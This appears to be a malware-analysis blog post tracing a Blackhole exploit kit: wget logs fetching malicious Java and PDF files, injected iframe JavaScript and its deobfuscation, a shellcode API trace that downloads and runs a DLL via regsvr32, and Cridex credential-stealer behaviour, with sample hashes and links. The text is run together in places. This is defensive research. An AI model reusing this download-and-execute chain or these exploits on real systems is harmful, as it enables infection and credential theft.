PS: There is a quite long list of variables for gaining “type confusion”between - static & an instance variable for this exploit, and I snipped them all at snapshot above, for more details please check download sample files provided at bottom post's link. [NEW] I was just mentioned in twitter, thanks to @PhysicalDrive0, that Java exploits always in threes, below is the message:
The first response I did was re-read the PluginDetect 0.7.9, and - be 100% sure that there is no sign of spn3.jar in there, next, I checked last fetched - spider logs.. couldn't find it either. But I just tried to download it by following the path of spn.jar & spn2.jar and....These things always come in threes...spn/spn2/spn3.jar #JavaExploit #ExploitKit
— PhysicalDrive0 (@PhysicalDrive0) November 18, 2012--2012-11-18 22:14:07-- h00p://↑By God, there is a spn3.jar!! But Why? Not in PluginDetect means no chance for infection.. Here's the snapshot, ↓it showed the file's upload date...
Connecting to connected.
Created socket 3.
---request begin---
GET /forum/data/spn3.jar HTTP/1.1
Referer: h00p://
User-Agent: MalwareMustDie is knocking AGAIN on your door! |-((
Accept: */*
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 18 Nov 2012 21:37:08 GMT
Content-Type: application/java-archive
Connection: keep-alive
Last-Modified: Mon, 22 Oct 2012 13:35:13 GMT
ETag: "1350005-521e-4cca5ec4d4640"
Accept-Ranges: bytes
Content-Length: 21022
---response end---
200 OK
Registered socket 3 for persistent reuse.
Length: 21022 (21K) [application/java-archive]
Saving to: `spn3.jar'
100%[=============>]21,022 43.2K/s in 0.5s
2012-11-18 22:14:08 (43.2 KB/s) - `spn3.jar' saved [21022/21022]-rw-r--r-- 1 xxx xxx 21022 Oct 22 22:35 spn3.jarSo let's see what exploit it has inside, first, in the public class fewwebwegb it has CVE-2012-0507 ↓
MD5 (spn3.jar) = 66c55d2cebc9d2d7b09a6e12b94fc1c9second, in the public class fewwebwegc it has CVE-2012-4681 exploit code↓
↑These two exploits are double hitting the suspect's PC to break Java's privilege.. [NEW] There is also another file called "t.pdf" which is not written in PluginDetect PoC (Thank's again to Physicaldrive0 for the hint) is as below:
--01:39:46-- h00p:// is a common Pidief exploit shellcode downloader, w/invalid xref it calls obfuscated code below to be extracted as shellcode,
=> `t.pdf'
Connecting to seconds 0.00, connected.
Created socket 1920.
---request begin---
GET /forum/data/t.pdf HTTP/1.0
Referer: h00p://
User-Agent: MalwareMustDie Now BANGING at your Door ||-((
Accept: */*
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Mon, 19 Nov 2012 01:02:39 GMT
Content-Type: application/pdf
Connection: keep-alive
Last-Modified: Fri, 14 Sep 2012 18:03:02 GMT
ETag: "13500e4-1fa7-4c9ad3c1e8180"
Accept-Ranges: bytes
Content-Length: 8103
---response end---
200 OK
Registered socket 1920 for persistent reuse.
Length: 8,103 (7.9K) [application/pdf]
01:39:47 (78.02 KB/s) - `t.pdf' saved [8103/8103]
$ ls -alF t.*
-rwx------ 1 xxx xxx 8103 Sep 14 09:03 t.pdf
$ md5 t.pdf
MD5 (t.pdf) = d1e2ff36a6c882b289d3b736d915a6cc0000000004 00000 fThis sample is having the highest detection ratio compares to other samples here:
0000000772 00000 n
0000001087 00000 n
0000001137 00000 n
0000000000 00000 f
0000000000 65535 f
0000001284 00000 n
: :
0000035752 00000 n
0000036095 00000 n
0000000026 65535 f
0000000050 65535 f
0000000051 65535 fMD5: d1e2ff36a6c882b289d3b736d915a6ccThere is another p1 parameter as per coded below, to drop one more malicious PDF
File size: 7.9 KB ( 8103 bytes )
File name: t.pdf
File type: PDF
Tags: pdf acroform invalid-xref
Detection ratio: 22 / 43
URL: p1() {Decoding this PDF download URL it wasn't hard, took me 2minutes to figure the url :-) Here's the proof:
var d=document.createElement("div");
d.innerHTML = "<iframe src=\"/forum/links/column.php?xrdbmuu="+x("c833f")+"&sckq="+x("laa")+"&bugeh=2v:1k:1m:32:33:1k:1k:31:1j:1o&hdulmrim="+x(pdfver.join("."))+"\"></iframe>";
document.body.appendChild(d); }--01:28:48-- h00p://203.80.16。81:8080/forum/links/column.php?xrdbmuu=30:1n:1i:1And here's my note in manually decoding:
=> `column.php@xrdbmuu=30%3A1n%3A1i%3A1i%3A33&sckq=39%3A2v%3A2v&bugeh
Connecting to 203.80.16・81:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27,788 (27K) [application/pdf]
01:28:50 (47.09 KB/s) - `column.php@xrdbmuu=30%3A1n%3A1i%3A1i%3A33&sckq=39%3A2v%
%3A1d%3A1f' saved [27788/27788]a=x("c833f");In the PDF file 0x3CD5 we can see this malicious code -->>[PASTEBIN]↑We saw the strings "parseInt(app.beep(0)).toString().substring(1,2)" is used 122times :-) app.beep is a typical PDF function, the one digit integer resulted is the key. example:
function x(s)
return d.join(":");
document.write(a); ====> "30:1n:1i:1i:33"
function x(s)
return d.join(":");
document.write(a); =====> "39:2v:2v"
function x(s)
return d.join(":");
document.write(a); =====> "1o:1d:1g:1d:1f"x="17777".toString().substring(1,2)↑Using above hint, the deobfs code is--->>[PASTEBIN] There is the Exploit Code of CVE-2009-0927 here:
document.write(x); ===> "7"And also an obfuscated shellcode here(see var bjsg value):
The shellcode itself contains a "plain" download url:
↑It must've been a a copy paster level-work of malware retards :-) Well, the url for download payload is as per below:
h00p:// Proof:--03:22:55-- h00p:// shellcode API calls (kernel32.dll & urlmon.dll) used for download is as below:
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 122,727 (120K) [application/x-msdownload]
100%[====================================>] 122,727 108.68K/s
03:22:57 (108.52 KB/s) - `column.php@vfg=....' saved [122727/122727]kernel32.VirtualProtect(lpAddress=0x4021be, dwSize=255)So we saved the payload as wpbt0.dll, and quick examined it with the below results... This malware drops the below files, before doing a self deletion:
kernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
kernel32.TerminateThread(dwExitCode=0)C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\exp1.tmpUsing CMD.EXE w/executed below command:
C:\Documents and Settings\Administrator\Application Data\KB00695911.exeC:\WINDOWS\system32\cmd.exeAnd the bat file will run the malware from new location:
+->"C:\WINDOWS\system32\cmd.exe" /c "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\exp1.tmp.bat""C:\Documents and Settings\Administrator\Application Data\KB00695911.exe"Explaining the below executable API traces:Address: 0x403872All of the sudden we saw the below malicious processes:
CreateRemoteThread(hProcess: 0x78,
lpThreadAttributes: 0x0,
dwStackSize: 0x0,
lpStartAddress: 0x3ced50,
lpParameter: 0x3c0000,
dwCreationFlags: 0x0,
lpThreadId: 0x0)0x2b0 lsass.exeFrom the previous findings, studying every malicious act of this binary, we know is a trojan credential stealer, Cridex variant.
0x6ec KB00085031.exeSamples downloads
Here is the picture of the captured payloads:We share these samples for the research/study purpose--->>[HERE]
VirusTotal detection ratio analysis
@unixfreaxjp ~/malware]$ date Sun Nov 18 04:38:25 JST 2012 column.php ( 2/44) -->09b4ceea8fd5e90eea21bc1e2c2892e4sample.pdf (15/43) -->e2efc2bc128c7aa7643f025a68194a1e CVE-2009-0927 spn.jar ( 3/44) -->fbdf22bf32946676dcb1408208a24945 CVE-2012-5076 spn2.jar ( 3/44) -->e98cde0af1e59379e8aec2a7a813225f CVE-2012-4681 & CVE-2012-1723 wpbt0.dll ( 9/43) -->e673b7c943b7395cc9ad61a301652880spn3.jar ( 15/43) -->66c55d2cebc9d2d7b09a6e12b94fc1c9 CVE-2012-0507 & CVE-2012-4681 t.pdf ( 22/43) -->d1e2ff36a6c882b289d3b736d915a6cc CVE-2009-2990References of CVE Exploit used
MSFT-MMPC: A technical analysis on new Java vulnerability(CVE-2012-5076)-->[CLICK]Immunity Products: Java 0day analysis (CVE-2012-4681) -->[CLICK]EXPLOIT-DB: Adobe Acrobat/Reader Collab getIcon Universal Exploit(CVE-2009-0927)-->[CLICK]Symantec: An Examination of Java Vulnerability CVE-2012-1723 -->[CLICK]MSFT-MMPC: The rise of a new Java vulnerability - CVE-2012-1723 -->[CLICK]Other NEW Refereces of PluginDetect BHEK 0.7.9 (The Non-Obfuscated JavaScript Version)
Sophos: Blackhole confusion. Custom builds or copycats? -->[HERE]F-Secure: Cool-er Than Blackhole? -->[HERE]Malware Don't Need Coffee: CVE-2012-5076 - Massively adopted - BHEK update to 2.0.1 -->[HERE][NEW!] Additional Info of PluginDetect BHEK 0.7.9 Obfuscated Version
We also detected obfuscation version of PluginDetect BHEK 0.7.9. The sources are from 2(two) spam attachment HTML files as per below pics:*) Thank's to Officer Ken Pryor (@KDPryor) for contributing the samples. The attached HTML file is having code leads to the obfuscated PluginDetect 0.7.9 Both spams is having same obfuscation code:
We can decode this code to find the PluginDetect urls as below: (click to enlarge)
The column.php is the obfuscation version of PluginDetect 0.7.9
It used a new pattern of deobfuscation, we decode it here-->>[PASTEBIN]↑with the step by step text guidance on how to it. The components of BHEK2 w/obfuscated PluginDetect 0.7.9 is as usual:
↑these are the samples captured from that host ( For the research purpose, here's all sample of this infection-->>[CLICK] Furthermore is having some IPs & DNS, see --->>[PASTEBIN]in those IP it has a LONG history of BHEK in past up to 30days -->>[PASTEBIN] In case you are wondering of detection rates(CVE data is as per above list): Email attached HTML1 (21/43) fa7b41a96360c09baad5b8fa210e6faeEmail attached HTML2 (11/43) 9d3ce7441ea6cffcc3aeee80238357feinfector.pdf (21/43) 2c325f278f741e8b4cfe66af87b96c40 ↑This pdf decoding guide is here -->>[PASTEBIN]spn3.jar (19/41) 66c55d2cebc9d2d7b09a6e12b94fc1c9 spn2.jar (3/43) 4ad0cb8901186409045bf2961f1cad26 spn.jar (3/41) 3eb329162cbf4f1538d7d0f1a23d391ct.pdf (21/43) d1e2ff36a6c882b289d3b736d915a6cc..And the Obfuscated PluginDetect 0.7.9 /column.php (4/42) ba76833dc28ad027d0ad148351c9b167